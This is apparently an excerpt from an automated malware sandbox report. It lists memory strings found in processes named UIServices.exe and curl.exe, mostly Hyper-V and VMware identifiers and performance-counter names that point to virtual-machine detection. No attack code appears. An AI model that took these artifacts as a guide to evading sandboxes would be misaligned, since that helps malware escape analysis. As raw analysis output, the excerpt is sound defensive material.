        Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition c
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service|y
        Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorU
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq
        Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service/
        Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hyperviso
        Source: UIServices.exe, 00000039.00000002.456580327.0000018E5A66F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended
        Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
        Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service!
        Source: UIServices.exe, 00000027.00000003.325370471.0000029C1E244000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401935244.0000027DB6E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
        Source: UIServices.exe, 00000027.00000003.323667575.0000029C1E251000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.437051619.0000018E5A626000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus#{
        Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesOc
        Source: curl.exe, 0000000E.00000002.265338006.00000237F57CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
        Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorH
        Source: UIServices.exe, 00000039.00000002.456342969.0000018E5A629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/secg
        Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitione
        Source: UIServices.exe, 00000027.00000003.323552275.0000029C1E207000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.323297174.0000029C1E207000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications
        Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor2
        Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service=UJa
        Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes]G~Q
        Source: UIServices.exe, 00000027.00000002.342535670.0000029C1C57B000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340784828.0000029C1C575000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336592757.0000029C1EB1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus PipesQ`
        Source: UIServices.exe, 00000027.00000003.335379625.0000029C1E499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CXowsstore_8wekyb3d8bbwe\AC\INetCookies\ESE\acturerName=&smBiosManufacturerName=VMware%2C+Inc.&phoneDeviceModel=&smBiosDm=VMware7%2C1
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
        Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Provider Pipesq
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
        Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical ProcessorA
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
        Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes=D
        Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
        Source: UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t5282Hyper-V Hypervisor Root Partition5284Virtual Proces
        Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical ProcessorV
        Source: UIServices.exe, 00000027.00000002.342535670.0000029C1C57B000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340784828.0000029C1C575000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336592757.0000029C1EB1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service^`
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Provider PipesLy
        Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
        Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor$
        Source: UIServices.exe, 00000039.00000002.455383437.000000806CD4A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: VMWare@
        Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical ProcessorT
        Source: curl.exe, 00000009.00000003.257996903.000001778212F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.258236371.0000017782132000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor-B
        Source: UIServices.exe, 00000027.00000003.327346477.0000029C1E76D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d
        Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor4
        Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
        Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Provider Pipes
        Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&n9
        Source: UIServices.exe, 0000002F.00000003.379294802.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.379026905.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time 